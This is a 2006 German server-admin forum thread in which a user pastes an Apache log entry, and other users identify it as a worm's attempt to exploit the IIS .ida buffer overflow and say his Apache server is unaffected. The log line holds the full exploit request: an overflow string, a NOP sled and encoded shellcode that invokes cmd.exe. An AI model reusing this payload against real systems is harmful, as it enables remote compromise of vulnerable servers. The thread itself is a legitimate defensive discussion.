Nur mal interessehalber

FreeBSD, Gentoo, openSUSE, CentOS, Ubuntu, Debian
twisterchen
Anbieter
Posts: 229
Joined: 2005-07-14 14:13

Nur mal interessehalber

Post by twisterchen » 2006-05-03 14:57

Hallo

Sowas hab ich ja noch nie gesehen weis von euch einer was einer damit bezwecken will?

access_log
222.83.213.214 - - [03/May/2006:01:18:53 +0200] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xebtx90x90x90_xebbx90x90x90xe8xf5xffxffxffx8doxf0x8d}-x90x90x90x8bxf7fxb8Hx063xc9fx8bxc8xb4x99xfcxac2xc4xaaxe2xfax14$xecx9fx99x99exaaP(xb9)xbdk7_xdefx99qx94x9dx99x99qx16x9dx99x99qxd7x9bx99x99x10x1cxdax9cx99x99qxc8x9bx99x99qxbdx9ax99x99x10x1cxdex9cx99x99q'x98x99x99x10x1cxd6x9cx99x99x12x1cxdex9cx99x99qxe6x9bx99x99x10x1cxd2x9cx99x99qxc7x99x99x99qbx99x99x99x1aax99xedyx12x1cxd2x9cx99x99xc9fx0cx94x9fx99x99x12x1cxdex9cx99x99xc9fx0cx94x9fx99x99x12x1cxb6x9cx99x99xc9fx0cx1fx9cx99x99x12x1cxa2x9cx99x99xc9fx0cx1fx9cx99x99!x99x99x99x99xc9x12x1cxd6x9cx99x99xc9fx0c\x9cx99x99!x99x99x99x99xc9fx0cOx9cx99x99Zx12x1cxd2x9cx99x99xf3x99xf3x80x14x1cx9ax98x99x99xc9x12x1cxd2x9cx99x99xc9fx0cx9ax9fx99x99Zx94x93xcexf0xf7xf7xedxd8xecxedxf6xd8xedxedxf8xfaxf2xb9xcfxabxa9x94x93x94x93xf1tx99x99x99fx0c&x9cx99x99x12x1cxb6x9cx99x99q_x99x99x99x1aafx96x1d/x99x99x99x1aax99xedxcettttxf3x99x14x1cxa6x9cx99x99xc9xf1x99x9dx99x99x12x1cxdax9cx99x99xc9x12x1cxb6x9cx99x99xc9fx0c/x9cx99x99x1aax99x96x1dx1bx99x99x99xf3x99x12x1cxa6x9cx99x99xc9x12x1cxdax9cx99x99xc9x12x1cxd2x9cx99x99xc9fx0cx9ax9fx99x99x1aafxedxfdttttrx1cxf3x99xf1x99x9dx99x99x12x1cxdax9cx99x99xc9x12x1cxd2x9cx99x99xc9fx0cx91x9fx99x99x1aax99xedxa7ttttx1aafxedxacttttxaaBxcax14x04xa6x9cx99x99xcaxc9x12x1cxdax9cx99x99xc9x12x1cxa2x9cx99x99xc9fx0c5x9cx99x99x1aax99xedx90ttttpxb2fffxaaYxd1ZxaaYZxaaBxcax14x04xbdx9bx99x99xcaxaaBxcaxcaxcaxc9fx0cvx9cx99x99x1aax99xedx92ttttx12x1cxbdx9bx99x99Z!ffffZx99x99x99x99x12x1cxdax9cx99x99^x99xddx99x99x99xc9fx0cxfex9cx99x99x12x04xdax9cx99x99x12x1cxaax9cx99x99x10xdaxd9x10xdaxa5x12x1cxaex9cx99x99x10xdaxa1!x98x98x99x99x10xdaxb5xcaxcaxaaYxc9xc9xc9xd9xc9xd1xc9xc9x14x1cxecx9fx99x99xc9xaaYxc9fx0cxeex9cx99x99x12x1cxaax9cx99x99xc9fx0cx1fx9cx99x99x12x1cxaex9cx99x99xc9fx0cx1fx9cx99x99x12x1cxdax9cx99x99x12x99Zxf1x99x9dx99x99xf3xd9fx0c9x9cx99x99ZxaaYxc9x14x1cwx9bx99x99^x99x95x99x99x99xc9x14x1cxaax9cx99x99xc9x14x1cxb6x9cx99x99xc9fx0cxc5x9cx99x99xaaYxc9x14x1cwx9bx99x99xc9x14x1cxa2x9cx99x99xc9x14x1cxaex9cx99x99xc9fx0cxc5x9cx99x99Zx99x99x99x99x99x99x99x99x98x99x99x99xc9x14x04xb8x9ax99x99^x9ax89x99x99x99xcax14x04xdbx9dx99x99xcaxc9fx0cex9cx99x99x12Ax1aax99xc1xe5Ex12ZZx89x99x99x99xf3x8ax14x1cxf6x9ax99x99xc9fx0cxbdx9fx99x99x14x1cxf6x9ax99x99xc9fx0cxa9x9fx99x99x1aax99xedxbbttttx12xe9x95x12ge4x1aax99xedx8attttx12x99xa5x93xedixa5Yxeduxa55xedqZx12n4x12x99Zx99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x12x1cxdax9cx99x99xc9xf3x9bfx0cx80x9fx99x99xf3x99xf3x98xf3x9bfx0cpx9cx99x99x1aafx96x1dx01x99x99x99x10x1cxdex9cx99x99x14x04xa6x9cx99x99^x9ax98x99x99x99xf3x9dxcaxf3x9dxf1ffx99x99xc9fx0cxa7x9fx99x99x1aax99xecxe9ttttxffx12x1cxf6x9fx99x99xffx10x1cxddx9dx99x99x12x1cxe8x9fx99x99x10x1cxdfx9dx99x99x1aafxecx96ttttqxb3fffx10x1cxdfx9dx99x99x12x1cxdex9cx99x99xf3x89x14x04xdbx9dx99x99xcaxc9fx0cix9cx99x99x1aax99xecxbattttxf3x9cx12x1cxdex9cx99x99xc9fx0clx9cx99x99x1aax99xecx92ttttx12x1cxdex9cx99x99ZxaaYZx9bx99x99xfax99x99x99x99x99x99x99x99x99x99x99x99!x99x99hxeex18xa1xd4xc3tx99xedx9ettttxd1rhx12Ax12xeaxa5x9ajx12xefxe1x9ajx12xe7xb9x9abx12xd7x8dxaaKxcfxcexc8x12xa6x9abx14,xc1x9fx99x99xaaP(x9ejxff>xedx95ttttxc0xc6x1a^x9dxdb{Fxc0xc6xc7x12Sx12xdfxbdx9aZHxx9aXxaaPxffx12x91x12xdfx85x9aZXxx9bx9aXx12x99x9aZx10x1cxf2x9fx99x99x12Zx14x04xd2x9fx99x99qxc9x99x99x99x10x1cxfex9fx99x99Zx14$xcax9cx99x99x12^xceqxb6x99x99x99xc6xc9xabYxaaPnHek7xc1x19xa6x99xedx8ettttxc9xcex12Fqx84x99x99x99xc6x10x9exc1xdexdexdexder@xdex19xa6x99xecSZxcax14x04xfex9fx99x99xc9fx8axc2Zxcex14$xf2x9fx99x99xcaxc9fx8exc6Zx99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99xd2xdcxcbxd7xdcxd5xaaxabx99xdaxebxfcxf8xedxfcxc9xf0xe9xfcx99xdexfcxedxcaxedxf8xebxedxecxe9xd0xf7xffxf6xd8x99xdaxebxfcxf8xedxfcxc9xebxf6xfaxfcxeaxeaxd8x99xdaxf5xf6xeaxfcxd1xf8xf7xfdxf5xfcx99xc9xfcxfcxf2xd7xf8xf4xfcxfdxc9xf0xe9xfcx99xdexf5xf6xfbxf8xf5xd8xf5xf5xf6xfax99xcexebxf0xedxfcxdfxf0xf5xfcx99xcbxfcxf8xfdxdfxf0xf5xfcx99xcaxf5xfcxfcxe9x99xcdxfcxebxf4xf0xf7xf8xedxfcxc9xebxf6xfaxfcxeaxeax99xdcxe1xf0xedxcdxf1xebxfcxf8xfdx99x99xcexcaxabxc6xaaxabx99xeaxf6xfaxf2xfcxedx99xfbxf0xf7xfdx99xf5xf0xeaxedxfcxf7x99xf8xfaxfaxfcxe9xedx99xeaxfcxf7xfdx99xebxfcxfaxefx99xfaxf5xf6xeaxfcxeaxf6xfaxf2xfcxedx99xcexcaxd8xcaxedxf8xebxedxecxe9x99xfexfcxedxf1xf6xeaxedxf7xf8xf4xfcx99xfexfcxedxf1xf6xeaxedxfbxe0xf7xf8xf4xfcx99xeaxfcxedxeaxf6xfaxf2xf6xe9xedx99x99x99xd5xf6xf8xfdxd5xf0xfbxebxf8xebxe0xd8x99xdexfcxedxc9xebxf6xfaxd8xfdxfdxebxfcxeaxeax99xeaxebx7fxeexa8xe9x7fxeex99xfaMxe9wx10cmd.exe$ HTTP/1.1" 404 1033 "-" "-"

error_log
[Wed May 03 01:18:53 2006] [error] [client 222.83.213.214] File does not exist: /home/httpd/vhosts/default/htdocs/NULL.IDA
Mich stört das zwar überhaupt nicht weil das bei mir alles ins Nirvana läuft weil ich im default gleich gar keine Datein habe aber mich würds halt Interessieren.

Gruss
Gerhard
Last edited by twisterchen on 2006-05-03 15:06, edited 1 time in total.

standbye
Posts: 146
Joined: 2002-10-16 18:05
Location: daheim :)

Re: Nur mal interessehalber

Post by standbye » 2006-05-03 15:00

deinen IIS exploiden ;)

thorsten
RSAC
Posts: 732
Joined: 2003-02-01 13:14
Location: Fuldatal

Re: Nur mal interessehalber

Post by thorsten » 2006-05-03 15:02

Dein Quoting ist leer, man kann es nur im Quelltext sehen.

Ich denke du hast diesen Ausschnitt aus deinem apache-log, oder?!
Da versucht jemand deinen IIS hochzunehmen ;)

google 1. Treffer bei Anfrage 'GET /NULL.IDA'
http://www.eeye.com/html/Research/Advis ... 10618.html

twisterchen
Anbieter
Posts: 229
Joined: 2005-07-14 14:13

Re: Nur mal interessehalber

Post by twisterchen » 2006-05-03 15:17

Hallo


Habe kein IIS sonder Apache 2.0.49-27.45

und wie oben noch nachträglich editiert
Läuft alles ins Nirvana


Gruss
Gerhard

rootsvr
Posts: 538
Joined: 2005-09-02 11:12

Re: Nur mal interessehalber

Post by rootsvr » 2006-05-03 15:22

Jep.. also keine Sorgen.. Würmer schauen nicht ob nen IIS lüäuft sondern schiessen einfach mal den Exploit ab..

Don't Panic